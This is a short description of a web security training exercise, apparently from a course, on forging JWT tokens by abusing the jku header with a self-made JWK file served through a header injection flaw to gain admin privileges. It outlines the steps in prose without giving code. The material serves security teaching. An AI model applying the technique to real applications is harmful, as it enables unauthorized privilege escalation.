JWT XI
Bookmarked!This exercise covers how to use the jku header to bypass an authentication based on JWT.
This exercise delves into the exploitation of the jku
header within JWT tokens, specifically aimed at forging a token to gain admin privileges. Building on previous exercises (JWT VIII and IX), you'll learn how to create a private and public key pair, craft a JWK file, and use a header injection vulnerability to serve this JWK file from a trusted URL. The key challenge here is to bypass URL restrictions by exploiting the application's header injection vulnerability, which allows the URL to start with a trusted application.
You'll start by generating RSA keys and creating scripts to extract necessary parameters (n
and e
), serve the JWK file via header injection, and sign the JWT payload. Despite the application's caching and URL restrictions, you'll learn to modify the URL and ensure the algorithm matches (RS256
). By the end of the exercise, you will have successfully forged a JWT token and bypassed the signature mechanism, demonstrating a critical vulnerability even in signed payloads.